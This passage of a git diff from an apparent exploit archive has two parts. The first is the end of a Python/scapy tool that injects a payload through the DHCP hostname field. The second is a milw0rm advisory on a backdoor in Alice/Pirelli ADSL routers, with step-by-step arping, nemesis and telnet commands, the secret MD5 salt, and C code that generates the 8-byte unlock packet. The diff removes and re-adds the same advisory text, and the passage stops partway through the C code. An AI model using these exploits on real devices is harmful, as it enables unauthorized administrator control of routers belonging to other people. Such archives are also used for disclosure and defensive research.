IN NO EVENT SHALL THE COPYRIGHT OWNER OR +#CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, +#EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, +#PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR +#PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF +#LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING +#NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS +#SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. +# +# +#Copyright (c) 2008, Rafael Dominguez Vega. +# +# This tool is designed for the purpose of performing security +# testing only and is not intended to be used for unlawful +# activities. +# +# This tool can be used to check for DHCP script injection vulnerabilities +# in different sofware products. +# +# Required Libraries: +#scapy.py - "Packet generator/sniffer and network scanner/discovery" +#http://www.secdev.org/projects/scapy/ +# +# Help can be viewed by running this file with --help. +# +# +# Author: Rafael Dominguez Vega +# Version: 0.0.2 +# +# Further information: rafael ({dot}) dominguez-vega <(at)> mwrinfosecurity {(dot)} com +# + +import optparse +from scapy import * +import socket +import fcntl +import struct +import os +import sys +import string +from optparse import OptionParser + +class OptionParser (optparse.OptionParser): + + def check_required (self, opt): + option = self.get_option(opt) + + if getattr(self.values, option.dest) is None: + self.error("%s option not supplied" % option) + +parser = OptionParser() +parser.add_option("-i", "--interface", action="store", dest="hwr",help="Network Interface (required)") +parser.add_option("-t", "--target", action="store", dest="server", help="DHCP Server IP address (required)") +parser.add_option("-p", "--hostname", action="store", dest="payload", help="DHCP Hostname. 
Between double quotes (\"\") if special characters are used (required)") + +(options, args) = parser.parse_args() + +parser.check_required("-i") +if options.hwr: + hwr = options.hwr +else: + sys.exit(0) + +parser.check_required("-t") +if options.server: + server = options.server +else: + sys.exit(0) + +parser.check_required("-p") +if options.payload: + payload = options.payload +else: + sys.exit(0) + + +#Acknowledgement to Paul Cannon & Frank Millman for the following code chunk + +def get_ip_address(ifname): + s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) + return socket.inet_ntoa(fcntl.ioctl( + s.fileno(), + 0x8915, + struct.pack('256s', ifname[:15]) + )[20:24]) + +def getMacAddress(): + if sys.platform == 'win32': + for line in os.popen("ipconfig /all"): + if line.lstrip().startswith('Physical Address'): + mac = line.split(':')[1].strip().replace('-',':') + break + else: + for line in os.popen("/sbin/ifconfig"): + if line.find('Ether') > -1: + mac = line.split()[4] + break + return mac + +# end of code chunk + +srcmac = getMacAddress() +ip = get_ip_address(hwr) + + +macad = srcmac.split(":") + +n0 = int(macad[0], 16) +n1 = int(macad[1], 16) +n2 = int(macad[2], 16) +n3 = int(macad[3], 16) +n4 = int(macad[4], 16) +n5 = int(macad[5], 16) + +m0 = chr(n0) +m1 = chr(n1) +m2 = chr(n2) +m3 = chr(n3) +m4 = chr(n4) +m5 = chr(n5) + +print(m0) +chmac = (m0+m1+m2+m3+m4+m5) + +q = ip.split(".") + +t0 = int(q[0]) +t1 = int(q[1]) +t2 = int(q[2]) +t3 = int(q[3]) + +r0 = chr(t0) +r1 = chr(t1) +r2 = chr(t2) +r3 = chr(t3) + +hexip = (r0+r1+r2+r3) + +print chmac +print hexip + +print("Starting....") + +ether = Ether(src= srcmac,dst="ff:ff:ff:ff:ff:ff") +ip = IP(src="0.0.0.0",dst="255.255.255.255") +udp = UDP(sport=68,dport=67) +bootp = BOOTP(op="BOOTREQUEST", chaddr= chmac) +dhcp = DHCP(options=[('message-type',3),('hostname', payload),(50, hexip),("server_id", server),('param_req_list','pad'),('end'),('pad')]) + +discover_packet = ether/ip/udp/bootp/dhcp 
+sendp(discover_packet) + +# milw0rm.com [2008-09-22] diff --git a/platforms/hardware/remote/6750.txt b/platforms/hardware/remote/6750.txt index 364b00caf..cf0423752 100755 --- a/platforms/hardware/remote/6750.txt +++ b/platforms/hardware/remote/6750.txt 
@@ -1,508 +1,508 @@ -############################################################################################# - - saxdax & drpepperONE - - -Discovered embedded backdoor to activate telnet/ftp/tftp/web extended -admin interface with Admin privileges, from internal network lan on -Alice ADSL CPE -Modem/Router, manufactered by Pirelli based on Broadcom platform. - -############################################################################################# - - saxdax & drpepperONE - -Router Vendor: Alice Telecom Italia CPE Modem/Routers manufactered by Pirelli - based on Broadcom platform. - -Model Affected: AGA[Alice Gate2 plus Wi-Fi]/AGB[Alice Gate2plus]AG2P-AG3[Alice Gate W2+] - /AGPV-AGPF[Alice Gate VoIP 2 Plus Wi-Fi] - -Firmware Version: All AGA/AGB/AG2P-AG3/AGPV-AGPF firmware version are affected. - -Platforms: Customized Linux version 2.6.8.1 on BroadcomBCM96348 chipset. - -Vulnerability: enable telnet/ftp/tftp and web-admin frominternal lan. - -Exploitation: internal network lan, versus Router - -Date: 13 Oct 2008 - -Authors: saxdax & drpepperONE - -e-mail: saxdax2@gmail.com drpepppperone@gmail.com - -Risk: medium>low - -############################################################################################# - -1) Introduction -2) Vulnerability -3) The Exploit -4) The Code -5) Fix - -############################################################################################# - -=============== -1) Introduction -=============== - -Telecom Italia is the most important Italian ISP offering an ADSL -service named "Alice". -Telecom Italia rent out with "Alice Adsl" service, different CPE -Modem/Router among which -the affected ones. -The interface to configure these modems are made extremily poor by the -provider to ensure -more control. -There's no way to enable telnet, ftp, tftp or more advanced web pages -from the web interface. 
- -http://www.telecomitalia.com/ -http://adsl.alice.it/ - -############################################################################################# - -================ -2) Vulnerability -================ - -An attacker can activate and get unauthorized access to the routers -administration -interface and telnet/ftp/tftp services from internal network. - -Every user in the LAN (or Wireless LAN) can nevertheless have access -to the routers -administration interface and telnet/ftp/tftp! - -If an attacker can get access to the administrator interface and -login, he has full control -over the routers configuration. - -############################################################################################# - - -============== -3) The Exploit -============== - -To enable telnet/ftp/tftp and web-admin interface it is necessary send a special -IP packet to router specific ip 192.168.1.1. -This works only from internal LAN where an attacker have and ip like -192.168.1.XX. -The ip packet send to router must have the following feature: - -1)IP-protocol-number 255 (there's a RAW SOCKET listening on the router) -2)Payload size 8 byte -3)The payload are the first 8 byte of a salted md5 of the mac address -of device br0 -4)br0 in these modems has the same mac of eth0 - -When the modem receives the packet all services will be enabled. - - -Example: - - ->From a GNU/LINUX distrib: - -1)Retrieve br0 maccaddress: - -arping -I eth0 -c 2 192.168.1.1 - -ARPING 192.168.1.1 from 192.168.1.2 eth0 -Unicast reply from 192.168.1.1 [00:01:02:03:04:05] 8.419ms -Unicast reply from 192.168.1.1 [00:01:02:03:04:05] 2.095ms -Sent 2 probes (1 broadcast(s)) -Received 2 response(s) - - -2)Calculate special md5 hash from br0 macaddress: create an hex 6 byte -long file with the mac address. - run the application below and copy the output hash. 
- http://rapidshare.com/files/153439269/AliceBDhashCreator.zip.html - -3)Send ip packet to router ip 192.168.1.1 with 8 byte paylod file -(with the tool you like) - - i.e.: nemesis ip -D 192.168.1.1 -p 255 -P hash.hex - - -4)Telnet to router : - - telnet 192.168.1.1 - - BCM96348 ADSL Router - Login: admin - Password: - - - -############################################################################################# - - -=========== -4) The Code -=========== - -/* Alice Backdoor Pwd creator by saxdax */ -/* this code generates an 8 byte hash to use as the paylod of the ip packet */ -/* the mac must be in an hex file and has to be passed as argument to -the program */ - -#include -#include -#include -#include "md5.h" - - -/* - * RFC 1321 compliant MD5 implementation - * - * Copyright (C) 2001-2003 Christophe Devine - * - * This program is free software; you can redistribute it and/or modify - * it under the terms of the GNU General Public License as published by - * the Free Software Foundation; either version 2 of the License, or - * (at your option) any later version. - * - * This program is distributed in the hope that it will be useful, - * but WITHOUT ANY WARRANTY; without even the implied warranty of - * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the - * GNU General Public License for more details. 
- * - * You should have received a copy of the GNU General Public License - * along with this program; if not, write to the Free Software - * Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA - */ - - - -#define GET_UINT32(n,b,i) \ -{ \ - (n) = ( (uint32) (b)[(i) ] ) \ - | ( (uint32) (b)[(i) + 1] << 8 ) \ - | ( (uint32) (b)[(i) + 2] << 16 ) \ - | ( (uint32) (b)[(i) + 3] << 24 ); \ -} - -#define PUT_UINT32(n,b,i) \ -{ \ - (b)[(i) ] = (uint8) ( (n) ); \ - (b)[(i) + 1] = (uint8) ( (n) >> 8 ); \ - (b)[(i) + 2] = (uint8) ( (n) >> 16 ); \ - (b)[(i) + 3] = (uint8) ( (n) >> 24 ); \ -} - -void md5_starts( md5_context *ctx ) -{ - ctx->total[0] = 0; - ctx->total[1] = 0; - - ctx->state[0] = 0x67452301; - ctx->state[1] = 0xEFCDAB89; - ctx->state[2] = 0x98BADCFE; - ctx->state[3] = 0x10325476; -} - -void md5_process( md5_context *ctx, uint8 data[64] ) -{ - uint32 X[16], A, B, C, D; - - GET_UINT32( X[0], data, 0 ); - GET_UINT32( X[1], data, 4 ); - GET_UINT32( X[2], data, 8 ); - GET_UINT32( X[3], data, 12 ); - GET_UINT32( X[4], data, 16 ); - GET_UINT32( X[5], data, 20 ); - GET_UINT32( X[6], data, 24 ); - GET_UINT32( X[7], data, 28 ); - GET_UINT32( X[8], data, 32 ); - GET_UINT32( X[9], data, 36 ); - GET_UINT32( X[10], data, 40 ); - GET_UINT32( X[11], data, 44 ); - GET_UINT32( X[12], data, 48 ); - GET_UINT32( X[13], data, 52 ); - GET_UINT32( X[14], data, 56 ); - GET_UINT32( X[15], data, 60 ); - -#define S(x,n) ((x << n) | ((x & 0xFFFFFFFF) >> (32 - n))) - -#define P(a,b,c,d,k,s,t) \ -{ \ - a += F(b,c,d) + X[k] + t; a = S(a,s) + b; \ -} - - A = ctx->state[0]; - B = ctx->state[1]; - C = ctx->state[2]; - D = ctx->state[3]; - -#define F(x,y,z) (z ^ (x & (y ^ z))) - - P( A, B, C, D, 0, 7, 0xD76AA478 ); - P( D, A, B, C, 1, 12, 0xE8C7B756 ); - P( C, D, A, B, 2, 17, 0x242070DB ); - P( B, C, D, A, 3, 22, 0xC1BDCEEE ); - P( A, B, C, D, 4, 7, 0xF57C0FAF ); - P( D, A, B, C, 5, 12, 0x4787C62A ); - P( C, D, A, B, 6, 17, 0xA8304613 ); - P( B, C, D, A, 7, 22, 0xFD469501 ); - P( 
A, B, C, D, 8, 7, 0x698098D8 ); - P( D, A, B, C, 9, 12, 0x8B44F7AF ); - P( C, D, A, B, 10, 17, 0xFFFF5BB1 ); - P( B, C, D, A, 11, 22, 0x895CD7BE ); - P( A, B, C, D, 12, 7, 0x6B901122 ); - P( D, A, B, C, 13, 12, 0xFD987193 ); - P( C, D, A, B, 14, 17, 0xA679438E ); - P( B, C, D, A, 15, 22, 0x49B40821 ); - -#undef F - -#define F(x,y,z) (y ^ (z & (x ^ y))) - - P( A, B, C, D, 1, 5, 0xF61E2562 ); - P( D, A, B, C, 6, 9, 0xC040B340 ); - P( C, D, A, B, 11, 14, 0x265E5A51 ); - P( B, C, D, A, 0, 20, 0xE9B6C7AA ); - P( A, B, C, D, 5, 5, 0xD62F105D ); - P( D, A, B, C, 10, 9, 0x02441453 ); - P( C, D, A, B, 15, 14, 0xD8A1E681 ); - P( B, C, D, A, 4, 20, 0xE7D3FBC8 ); - P( A, B, C, D, 9, 5, 0x21E1CDE6 ); - P( D, A, B, C, 14, 9, 0xC33707D6 ); - P( C, D, A, B, 3, 14, 0xF4D50D87 ); - P( B, C, D, A, 8, 20, 0x455A14ED ); - P( A, B, C, D, 13, 5, 0xA9E3E905 ); - P( D, A, B, C, 2, 9, 0xFCEFA3F8 ); - P( C, D, A, B, 7, 14, 0x676F02D9 ); - P( B, C, D, A, 12, 20, 0x8D2A4C8A ); - -#undef F - -#define F(x,y,z) (x ^ y ^ z) - - P( A, B, C, D, 5, 4, 0xFFFA3942 ); - P( D, A, B, C, 8, 11, 0x8771F681 ); - P( C, D, A, B, 11, 16, 0x6D9D6122 ); - P( B, C, D, A, 14, 23, 0xFDE5380C ); - P( A, B, C, D, 1, 4, 0xA4BEEA44 ); - P( D, A, B, C, 4, 11, 0x4BDECFA9 ); - P( C, D, A, B, 7, 16, 0xF6BB4B60 ); - P( B, C, D, A, 10, 23, 0xBEBFBC70 ); - P( A, B, C, D, 13, 4, 0x289B7EC6 ); - P( D, A, B, C, 0, 11, 0xEAA127FA ); - P( C, D, A, B, 3, 16, 0xD4EF3085 ); - P( B, C, D, A, 6, 23, 0x04881D05 ); - P( A, B, C, D, 9, 4, 0xD9D4D039 ); - P( D, A, B, C, 12, 11, 0xE6DB99E5 ); - P( C, D, A, B, 15, 16, 0x1FA27CF8 ); - P( B, C, D, A, 2, 23, 0xC4AC5665 ); - -#undef F - -#define F(x,y,z) (y ^ (x | ~z)) - - P( A, B, C, D, 0, 6, 0xF4292244 ); - P( D, A, B, C, 7, 10, 0x432AFF97 ); - P( C, D, A, B, 14, 15, 0xAB9423A7 ); - P( B, C, D, A, 5, 21, 0xFC93A039 ); - P( A, B, C, D, 12, 6, 0x655B59C3 ); - P( D, A, B, C, 3, 10, 0x8F0CCC92 ); - P( C, D, A, B, 10, 15, 0xFFEFF47D ); - P( B, C, D, A, 1, 21, 0x85845DD1 ); - P( A, B, C, D, 8, 6, 
0x6FA87E4F ); - P( D, A, B, C, 15, 10, 0xFE2CE6E0 ); - P( C, D, A, B, 6, 15, 0xA3014314 ); - P( B, C, D, A, 13, 21, 0x4E0811A1 ); - P( A, B, C, D, 4, 6, 0xF7537E82 ); - P( D, A, B, C, 11, 10, 0xBD3AF235 ); - P( C, D, A, B, 2, 15, 0x2AD7D2BB ); - P( B, C, D, A, 9, 21, 0xEB86D391 ); - -#undef F - - ctx->state[0] += A; - ctx->state[1] += B; - ctx->state[2] += C; - ctx->state[3] += D; -} - -void md5_update( md5_context *ctx, uint8 *input, uint32 length ) -{ - uint32 left, fill; - - if( ! length ) return; - - left = ctx->total[0] & 0x3F; - fill = 64 - left; - - ctx->total[0] += length; - ctx->total[0] &= 0xFFFFFFFF; - - if( ctx->total[0] < length ) - ctx->total[1]++; - - if( left && length >= fill ) - { - memcpy( (void *) (ctx->buffer + left), - (void *) input, fill ); - md5_process( ctx, ctx->buffer ); - length -= fill; - input += fill; - left = 0; - } - - while( length >= 64 ) - { - md5_process( ctx, input ); - length -= 64; - input += 64; - } - - if( length ) - { - memcpy( (void *) (ctx->buffer + left), - (void *) input, length ); - } -} - -static uint8 md5_padding[64] = -{ - 0x80, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0 -}; - -void md5_finish( md5_context *ctx, uint8 digest[16] ) -{ - uint32 last, padn; - uint32 high, low; - uint8 msglen[8]; - - - high = ( ctx->total[0] >> 29 ) - | ( ctx->total[1] << 3 ); - low = ( ctx->total[0] << 3 ); - - PUT_UINT32( low, msglen, 0 ); - PUT_UINT32( high, msglen, 4 ); - - //for(int i=0;i<8;i++) printf("length %d\n",msglen[i]); - - last = ctx->total[0] & 0x3F; - padn = ( last < 56 ) ? 
( 56 - last ) : ( 120 - last ); - - md5_update( ctx, md5_padding, padn ); - md5_update( ctx, msglen, 8 ); - - PUT_UINT32( ctx->state[0], digest, 0 ); - PUT_UINT32( ctx->state[1], digest, 4 ); - PUT_UINT32( ctx->state[2], digest, 8 ); - PUT_UINT32( ctx->state[3], digest, 12 ); -} - -//#ifdef TEST - - - -/* - * those are the standard RFC 1321 test vectors - */ - -static char *msg[] = -{ - "", - "a", - "abc", - "message digest", - "abcdefghijklmnopqrstuvwxyz", - "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789", - "12345678901234567890123456789012345678901234567890123456789012" \ - "345678901234567890" -}; - -static char *val[] = -{ - "d41d8cd98f00b204e9800998ecf8427e", - "0cc175b9c0f1b6a831c399e269772661", - "900150983cd24fb0d6963f7d28e17f72", - "f96b697d7cb7938d525a2f31aaf161d0", - "c3fcd3d76192e4007dfb496cca67e13b", - "d174ab98d277d9f5a5611c2c9f419d9f", - "57edf4a22be3c955ac49da2e2107b67a" -}; - -static char saltOrig[] = -{0x04, 0x07, 0x67, 0x10, 0x02, 0x81, 0xFA, 0x66, 0x11, 0x41, 0x68, -0x11, 0x17, 0x01, 0x05, 0x22, 0x71, 0x04, 0x10, 0x33}; - -int main( int argc, char *argv[] ) -{ - FILE *f; - int i, j; - char output[33]; - md5_context ctx; - unsigned char buf[1000]; - unsigned char md5sum[16]; - unsigned char salt[20]; - - printf( "****************************\n"); - printf( "Alice BackDoor hash creator \n"); - printf( "by saxdax and drPepperOne \n"); - printf( "****************************\n\n"); - - if( argc < 2 ) - { - printf( "\n Usage: %s pathfileMAC\n\n", argv[0] ); - return 0; - } - - if( ! 
( f = fopen( argv[1], "rb" ) ) ) - { - perror( "fopen" ); - return( 1 ); - } - - md5_starts( &ctx ); - - while( ( i = fread( buf, 1, sizeof( buf ), f ) ) > 0 ) - { - md5_update( &ctx, buf, i ); - } - - memcpy(salt, saltOrig, 20); - - md5_update( &ctx, salt, 20 ); - - md5_finish( &ctx, md5sum ); - - printf("Payload is: "); - for( j = 0; j < 8; j++ ) - { - printf( "%02x", md5sum[j] ); - } - - return( 0 ); -} - - - - - - - -############################################################################################# - -====== -5) Fix -====== - - -Atcualy at 13 Oct 2008 NO FIX available. - -############################################################################################# - -# milw0rm.com [2008-10-14] +############################################################################################# + + saxdax & drpepperONE + + +Discovered embedded backdoor to activate telnet/ftp/tftp/web extended +admin interface with Admin privileges, from internal network lan on +Alice ADSL CPE +Modem/Router, manufactered by Pirelli based on Broadcom platform. + +############################################################################################# + + saxdax & drpepperONE + +Router Vendor: Alice Telecom Italia CPE Modem/Routers manufactered by Pirelli + based on Broadcom platform. + +Model Affected: AGA[Alice Gate2 plus Wi-Fi]/AGB[Alice Gate2plus]AG2P-AG3[Alice Gate W2+] + /AGPV-AGPF[Alice Gate VoIP 2 Plus Wi-Fi] + +Firmware Version: All AGA/AGB/AG2P-AG3/AGPV-AGPF firmware version are affected. + +Platforms: Customized Linux version 2.6.8.1 on BroadcomBCM96348 chipset. + +Vulnerability: enable telnet/ftp/tftp and web-admin frominternal lan. 
+ +Exploitation: internal network lan, versus Router + +Date: 13 Oct 2008 + +Authors: saxdax & drpepperONE + +e-mail: saxdax2@gmail.com drpepppperone@gmail.com + +Risk: medium>low + +############################################################################################# + +1) Introduction +2) Vulnerability +3) The Exploit +4) The Code +5) Fix + +############################################################################################# + +=============== +1) Introduction +=============== + +Telecom Italia is the most important Italian ISP offering an ADSL +service named "Alice". +Telecom Italia rent out with "Alice Adsl" service, different CPE +Modem/Router among which +the affected ones. +The interface to configure these modems are made extremily poor by the +provider to ensure +more control. +There's no way to enable telnet, ftp, tftp or more advanced web pages +from the web interface. + +http://www.telecomitalia.com/ +http://adsl.alice.it/ + +############################################################################################# + +================ +2) Vulnerability +================ + +An attacker can activate and get unauthorized access to the routers +administration +interface and telnet/ftp/tftp services from internal network. + +Every user in the LAN (or Wireless LAN) can nevertheless have access +to the routers +administration interface and telnet/ftp/tftp! + +If an attacker can get access to the administrator interface and +login, he has full control +over the routers configuration. + +############################################################################################# + + +============== +3) The Exploit +============== + +To enable telnet/ftp/tftp and web-admin interface it is necessary send a special +IP packet to router specific ip 192.168.1.1. +This works only from internal LAN where an attacker have and ip like +192.168.1.XX. 
+The ip packet send to router must have the following feature: + +1)IP-protocol-number 255 (there's a RAW SOCKET listening on the router) +2)Payload size 8 byte +3)The payload are the first 8 byte of a salted md5 of the mac address +of device br0 +4)br0 in these modems has the same mac of eth0 + +When the modem receives the packet all services will be enabled. + + +Example: + + +>From a GNU/LINUX distrib: + +1)Retrieve br0 maccaddress: + +arping -I eth0 -c 2 192.168.1.1 + +ARPING 192.168.1.1 from 192.168.1.2 eth0 +Unicast reply from 192.168.1.1 [00:01:02:03:04:05] 8.419ms +Unicast reply from 192.168.1.1 [00:01:02:03:04:05] 2.095ms +Sent 2 probes (1 broadcast(s)) +Received 2 response(s) + + +2)Calculate special md5 hash from br0 macaddress: create an hex 6 byte +long file with the mac address. + run the application below and copy the output hash. + http://rapidshare.com/files/153439269/AliceBDhashCreator.zip.html + +3)Send ip packet to router ip 192.168.1.1 with 8 byte paylod file +(with the tool you like) + + i.e.: nemesis ip -D 192.168.1.1 -p 255 -P hash.hex + + +4)Telnet to router : + + telnet 192.168.1.1 + + BCM96348 ADSL Router + Login: admin + Password: + + + +############################################################################################# + + +=========== +4) The Code +=========== + +/* Alice Backdoor Pwd creator by saxdax */ +/* this code generates an 8 byte hash to use as the paylod of the ip packet */ +/* the mac must be in an hex file and has to be passed as argument to +the program */ + +#include +#include +#include +#include "md5.h" + + +/* + * RFC 1321 compliant MD5 implementation + * + * Copyright (C) 2001-2003 Christophe Devine + * + * This program is free software; you can redistribute it and/or modify + * it under the terms of the GNU General Public License as published by + * the Free Software Foundation; either version 2 of the License, or + * (at your option) any later version. 
+ * + * This program is distributed in the hope that it will be useful, + * but WITHOUT ANY WARRANTY; without even the implied warranty of + * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the + * GNU General Public License for more details. + * + * You should have received a copy of the GNU General Public License + * along with this program; if not, write to the Free Software + * Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA + */ + + + +#define GET_UINT32(n,b,i) \ +{ \ + (n) = ( (uint32) (b)[(i) ] ) \ + | ( (uint32) (b)[(i) + 1] << 8 ) \ + | ( (uint32) (b)[(i) + 2] << 16 ) \ + | ( (uint32) (b)[(i) + 3] << 24 ); \ +} + +#define PUT_UINT32(n,b,i) \ +{ \ + (b)[(i) ] = (uint8) ( (n) ); \ + (b)[(i) + 1] = (uint8) ( (n) >> 8 ); \ + (b)[(i) + 2] = (uint8) ( (n) >> 16 ); \ + (b)[(i) + 3] = (uint8) ( (n) >> 24 ); \ +} + +void md5_starts( md5_context *ctx ) +{ + ctx->total[0] = 0; + ctx->total[1] = 0; + + ctx->state[0] = 0x67452301; + ctx->state[1] = 0xEFCDAB89; + ctx->state[2] = 0x98BADCFE; + ctx->state[3] = 0x10325476; +} + +void md5_process( md5_context *ctx, uint8 data[64] ) +{ + uint32 X[16], A, B, C, D; + + GET_UINT32( X[0], data, 0 ); + GET_UINT32( X[1], data, 4 ); + GET_UINT32( X[2], data, 8 ); + GET_UINT32( X[3], data, 12 ); + GET_UINT32( X[4], data, 16 ); + GET_UINT32( X[5], data, 20 ); + GET_UINT32( X[6], data, 24 ); + GET_UINT32( X[7], data, 28 ); + GET_UINT32( X[8], data, 32 ); + GET_UINT32( X[9], data, 36 ); + GET_UINT32( X[10], data, 40 ); + GET_UINT32( X[11], data, 44 ); + GET_UINT32( X[12], data, 48 ); + GET_UINT32( X[13], data, 52 ); + GET_UINT32( X[14], data, 56 ); + GET_UINT32( X[15], data, 60 ); + +#define S(x,n) ((x << n) | ((x & 0xFFFFFFFF) >> (32 - n))) + +#define P(a,b,c,d,k,s,t) \ +{ \ + a += F(b,c,d) + X[k] + t; a = S(a,s) + b; \ +} + + A = ctx->state[0]; + B = ctx->state[1]; + C = ctx->state[2]; + D = ctx->state[3]; + +#define F(x,y,z) (z ^ (x & (y ^ z))) + + P( A, B, C, D, 0, 7, 0xD76AA478 ); + P( D, A, B, C, 
1, 12, 0xE8C7B756 ); + P( C, D, A, B, 2, 17, 0x242070DB ); + P( B, C, D, A, 3, 22, 0xC1BDCEEE ); + P( A, B, C, D, 4, 7, 0xF57C0FAF ); + P( D, A, B, C, 5, 12, 0x4787C62A ); + P( C, D, A, B, 6, 17, 0xA8304613 ); + P( B, C, D, A, 7, 22, 0xFD469501 ); + P( A, B, C, D, 8, 7, 0x698098D8 ); + P( D, A, B, C, 9, 12, 0x8B44F7AF ); + P( C, D, A, B, 10, 17, 0xFFFF5BB1 ); + P( B, C, D, A, 11, 22, 0x895CD7BE ); + P( A, B, C, D, 12, 7, 0x6B901122 ); + P( D, A, B, C, 13, 12, 0xFD987193 ); + P( C, D, A, B, 14, 17, 0xA679438E ); + P( B, C, D, A, 15, 22, 0x49B40821 ); + +#undef F + +#define F(x,y,z) (y ^ (z & (x ^ y))) + + P( A, B, C, D, 1, 5, 0xF61E2562 ); + P( D, A, B, C, 6, 9, 0xC040B340 ); + P( C, D, A, B, 11, 14, 0x265E5A51 ); + P( B, C, D, A, 0, 20, 0xE9B6C7AA ); + P( A, B, C, D, 5, 5, 0xD62F105D ); + P( D, A, B, C, 10, 9, 0x02441453 ); + P( C, D, A, B, 15, 14, 0xD8A1E681 ); + P( B, C, D, A, 4, 20, 0xE7D3FBC8 ); + P( A, B, C, D, 9, 5, 0x21E1CDE6 ); + P( D, A, B, C, 14, 9, 0xC33707D6 ); + P( C, D, A, B, 3, 14, 0xF4D50D87 ); + P( B, C, D, A, 8, 20, 0x455A14ED ); + P( A, B, C, D, 13, 5, 0xA9E3E905 ); + P( D, A, B, C, 2, 9, 0xFCEFA3F8 ); + P( C, D, A, B, 7, 14, 0x676F02D9 ); + P( B, C, D, A, 12, 20, 0x8D2A4C8A ); + +#undef F + +#define F(x,y,z) (x ^ y ^ z) + + P( A, B, C, D, 5, 4, 0xFFFA3942 ); + P( D, A, B, C, 8, 11, 0x8771F681 ); + P( C, D, A, B, 11, 16, 0x6D9D6122 ); + P( B, C, D, A, 14, 23, 0xFDE5380C ); + P( A, B, C, D, 1, 4, 0xA4BEEA44 ); + P( D, A, B, C, 4, 11, 0x4BDECFA9 ); + P( C, D, A, B, 7, 16, 0xF6BB4B60 ); + P( B, C, D, A, 10, 23, 0xBEBFBC70 ); + P( A, B, C, D, 13, 4, 0x289B7EC6 ); + P( D, A, B, C, 0, 11, 0xEAA127FA ); + P( C, D, A, B, 3, 16, 0xD4EF3085 ); + P( B, C, D, A, 6, 23, 0x04881D05 ); + P( A, B, C, D, 9, 4, 0xD9D4D039 ); + P( D, A, B, C, 12, 11, 0xE6DB99E5 ); + P( C, D, A, B, 15, 16, 0x1FA27CF8 ); + P( B, C, D, A, 2, 23, 0xC4AC5665 ); + +#undef F + +#define F(x,y,z) (y ^ (x | ~z)) + + P( A, B, C, D, 0, 6, 0xF4292244 ); + P( D, A, B, C, 7, 10, 0x432AFF97 ); + 
P( C, D, A, B, 14, 15, 0xAB9423A7 ); + P( B, C, D, A, 5, 21, 0xFC93A039 ); + P( A, B, C, D, 12, 6, 0x655B59C3 ); + P( D, A, B, C, 3, 10, 0x8F0CCC92 ); + P( C, D, A, B, 10, 15, 0xFFEFF47D ); + P( B, C, D, A, 1, 21, 0x85845DD1 ); + P( A, B, C, D, 8, 6, 0x6FA87E4F ); + P( D, A, B, C, 15, 10, 0xFE2CE6E0 ); + P( C, D, A, B, 6, 15, 0xA3014314 ); + P( B, C, D, A, 13, 21, 0x4E0811A1 ); + P( A, B, C, D, 4, 6, 0xF7537E82 ); + P( D, A, B, C, 11, 10, 0xBD3AF235 ); + P( C, D, A, B, 2, 15, 0x2AD7D2BB ); + P( B, C, D, A, 9, 21, 0xEB86D391 ); + +#undef F + + ctx->state[0] += A; + ctx->state[1] += B; + ctx->state[2] += C; + ctx->state[3] += D; +} + +void md5_update( md5_context *ctx, uint8 *input, uint32 length ) +{ + uint32 left, fill; + + if( ! length ) return; + + left = ctx->total[0] & 0x3F; + fill = 64 - left; + + ctx->total[0] += length; + ctx->total[0] &= 0xFFFFFFFF; + + if( ctx->total[0] < length ) + ctx->total[1]++; + + if( left && length >= fill ) + { + memcpy( (void *) (ctx->buffer + left), + (void *) input, fill ); + md5_process( ctx, ctx->buffer ); + length -= fill; + input += fill; + left = 0; + } + + while( length >= 64 ) + { + md5_process( ctx, input ); + length -= 64; + input += 64; + } + + if( length ) + { + memcpy( (void *) (ctx->buffer + left), + (void *) input, length ); + } +} + +static uint8 md5_padding[64] = +{ + 0x80, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, + 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, + 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, + 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0 +}; + +void md5_finish( md5_context *ctx, uint8 digest[16] ) +{ + uint32 last, padn; + uint32 high, low; + uint8 msglen[8]; + + + high = ( ctx->total[0] >> 29 ) + | ( ctx->total[1] << 3 ); + low = ( ctx->total[0] << 3 ); + + PUT_UINT32( low, msglen, 0 ); + PUT_UINT32( high, msglen, 4 ); + + //for(int i=0;i<8;i++) printf("length %d\n",msglen[i]); + + last = ctx->total[0] & 0x3F; + padn = ( last < 56 ) ? 
